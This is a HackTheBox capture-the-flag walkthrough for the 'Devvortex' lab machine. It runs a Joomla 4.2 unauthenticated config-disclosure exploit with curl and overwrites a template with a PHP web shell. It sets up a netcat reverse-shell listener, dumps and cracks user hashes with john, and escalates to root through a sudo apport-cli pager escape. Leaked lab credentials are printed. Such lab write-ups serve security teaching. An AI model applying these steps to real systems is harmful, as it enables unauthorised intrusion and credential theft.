HackTheBox | Devvortex

In this walkthrough, I demonstrate how I obtained complete ownership of Devvortex on HackTheBox
HackTheBox | Devvortex
In: HackTheBox, Attack, CTF

Nmap Results

# Nmap 7.94SVN scan initiated Mon Feb 26 12:46:59 2024 as: nmap -Pn -p- --min-rate 2000 -A -oN nmap.txt
Nmap scan report for
Host is up (0.013s latency).
Not shown: 65120 closed tcp ports (reset), 413 filtered tcp ports (no-response)
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://devvortex.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 256/tcp)
1   13.11 ms
2   13.17 ms

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Feb 26 12:47:31 2024 -- 1 IP address (1 host up) scanned in 31.88 seconds

Note the redirect to http://devvortex.htb in the tcp/80 output. Let's add that to our /etc/hosts file.

echo '       devvortex.htb' | sudo tee -a /etc/hosts

Service Enumeration


Gobuster Enumeration

Directory and File Enumeration

gobuster dir -u http://devvortex.htb -w /usr/share/seclists/Discovery/Web-Content/big.txt -x php,html,txt -o gobuster-80.txt -t 100

Nothing too interesting in the file and directory enumeration. Let's check for any additional server names.

Virtual Host Enumeration

gobuster vhost --domain devvortex.htb --append-domain -u -w /usr/share/dnsrecon/subdomains-top1mil.txt -t 20 -o vhost.txt --exclude-length 166

Let's add this server name to our /etc/hosts file as well.

echo '        dev.devvortex.htb' | sudo tee -a /etc/hosts



# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
# eg the Disallow rule for the /administrator/ folder MUST
# be changed to read
# Disallow: /joomla/administrator/
# For more information about the robots.txt standard, see:
# https://www.robotstxt.org/orig.html

User-agent: *
Disallow: /administrator/
Disallow: /api/
Disallow: /bin/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /layouts/
Disallow: /libraries/
Disallow: /logs/
Disallow: /modules/
Disallow: /plugins/
Disallow: /tmp/


Joomla! CMS™

1- Overview
	* This is a Joomla! 4.x installation/upgrade package.
	* Joomla! Official site: https://www.joomla.org
	* Joomla! 4.2 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_4.2_version_history
	* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/4.2-dev


Enumerating Joomla

Attacking and Enumerating Joomla | HackerTarget.com
Discover the tips and techniques used to attack and break into Joomla based websites. Improve security by understanding these hacker techniques.


<!-- Only showing specific content for brevity -->
<!-- Only showing specific content for brevity -->
<!-- Only showing specific content for brevity -->

Running searchsploit joomla 4.2.6 we can see that there is an unauthenticated information disclosure vulnerability we can try.

Joomla! v4.2.8 - Unauthenticated information disclosure | php/webapps/51334.py

Looking over the source code, we can see it's actually a ruby script and that it's quite simple in nature.

We can see that it's simply making a HTTP GET request to http://domain.tld/api/index.php/v1/config/application?public=true — with the problem being that the public data returned from the API contains sensitive information.

def fetch_config(root_url, http
  vuln_url = "#{root_url}/api/index.php/v1/config/application?public=true"

We can perform this exploit manually using curl and jq to parse the data.

sudo apt install -y jq
curl -s 'http://dev.devvortex.htb/api/index.php/v1/config/application?public=true' | jq > joomla.json
jq --color-output < joomla.json | less -R
Potential username and password combination


Joomla Administrator

The Joomla version on the target server is vulnerable to information disclosure and leaks a username and password combination we can use to log into the Administrator dashboard.

Web Shell to Reverse Shell

Click on 'System'
Click on 'Site Templates'
Click the active template
Click on 'offline.php'
wwwolf-php-webshell/webshell.php at master · WhiteWinterWolf/wwwolf-php-webshell
WhiteWinterWolf’s PHP web shell. Contribute to WhiteWinterWolf/wwwolf-php-webshell development by creating an account on GitHub.

Borrow the PHP web shell code from here and overwrite 'offline.php'

Click Save
We can now run commands and upload files through out web shell
We can see 'nc' is installed on the target
sudo rlwrap nc -lnvp 443

Start a TCP listener on port 443

export TERM=linux
python3 -c "import pty; pty.spawn('/bin/bash')"

Run these to have a better experience in the reverse shell

Post-Exploit Enumeration

Operating Environment

OS & Kernel

VERSION="20.04.6 LTS (Focal Fossa)"
PRETTY_NAME="Ubuntu 20.04.6 LTS"

Linux devvortex 5.4.0-167-generic #184-Ubuntu SMP Tue Oct 31 09:21:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux

Current User

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Sorry, user www-data may not run sudo on devvortex.    

Users and Groups

Local Users


Local Groups


Network Configurations

Network Interfaces

eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:ad:43 brd ff:ff:ff:ff:ff:ff
    inet brd scope global eth0
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:ad43/64 scope global dynamic mngtmpaddr 
       valid_lft 86392sec preferred_lft 14392sec
    inet6 fe80::250:56ff:feb9:ad43/64 scope link 
       valid_lft forever preferred_lft forever    

Open Ports

tcp        0      0*               LISTEN      -                   
tcp        0      0 *               LISTEN      -                   
tcp        0      0*               LISTEN      -    

Privilege Escalation

Lateral to Logan

The password that was revealed in the unauthenticated information disclosure was used to log us into the Joomla administrator dashboard. However, it is also used as the MySQL service password.

mysql -u 'lewis' -p'P4ntherg0t1n5r3c0n##'
show databases;
use joomla;
show tables;
select * from sd4fg_users;
echo '$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12' > hash
john --wordlist=~/Pentest/WordLists/rockyou.txt hash
ssh logan@devvortex.htb
From here, we repeat the post-exploit enumeration steps

Escalate to Root

We have sudo privileges on /usr/bin/apport-cli
sudo apport-cli 2.20.11 local privilege escalation - Google Search
The version of apport-cli on the target applies to this CVE
fix: Do not run sensible-pager as root if using sudo/pkexec · canonical/apport@e5f78cc
The apport-cli supports view a crash. These features invoke the default pager, which is likely to be less, other functions may apply. It can be used to break out from restricted environments by sp…

Reference the GitHub commit in the CVE details

man apport-cli

We should be able to generate a crash report manually using the -f and --save options.

sudo /usr/bin/apport-cli -f --save pwn.crash
I just chose option 5
sudo /usr/bin/apport-cli -c pwn.crash
Choose option 'V'
You're viewing in 'less', so use the '!' to run a system command





More from 0xBEN
Table of Contents
Great! You’ve successfully signed up.
Welcome back! You've successfully signed in.
You've successfully subscribed to 0xBEN.
Your link has expired.
Success! Check your email for magic link to sign-in.
Success! Your billing info has been updated.
Your billing was not updated.